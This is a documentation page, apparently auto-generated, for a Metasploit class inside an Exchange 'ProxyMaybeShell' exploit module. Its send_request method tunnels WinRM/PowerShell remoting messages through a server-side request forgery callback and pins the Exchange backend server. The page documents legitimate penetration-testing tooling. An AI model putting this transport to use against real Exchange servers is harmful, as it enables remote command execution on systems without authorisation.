Class: Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::SSRFWinRMConnection::TransportFactory::HttpSsrf

Inherits:
WinRM::HTTP::HttpTransport
  • Object
show all
Defined in:
lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb

Instance Attribute Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(endpoint, options) ⇒ HttpSsrf

rubocop:disable Lint/



131
132
133
134
135
136
137
138
 
# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 131

def initialize(endpoint, options)
  @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint
  @ssrf_proc = options[:ssrf_proc]
  # this tracks the backend target, the PSRP session needs to communicate with one target
  # this would be the case if Exchange Data Access Group (DAG) is in use
  @backend = nil
  @max_backend_attempts = [options.fetch(:max_backend_retries, 10) + 1, 1].max
end

Instance Attribute Details

#backendObject (readonly)

Returns the value of attribute backend.



160
161
162
 
# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 160

def backend
  @backend
end

Instance Method Details

#send_request(message) ⇒ Object 



140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
 
# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 140

def send_request(message)
  resp = nil
  @max_backend_attempts.times do
    resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })

    if resp.code == 500 && resp.headers['X-CalculatedBETarget'] != @backend
      # retry the request if it failed and the backend was different than the target
      next
    end

    break
  end

  if resp&.code == 200 && @backend.nil?
    @backend = resp.headers['X-CalculatedBETarget']
  end

  WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml
end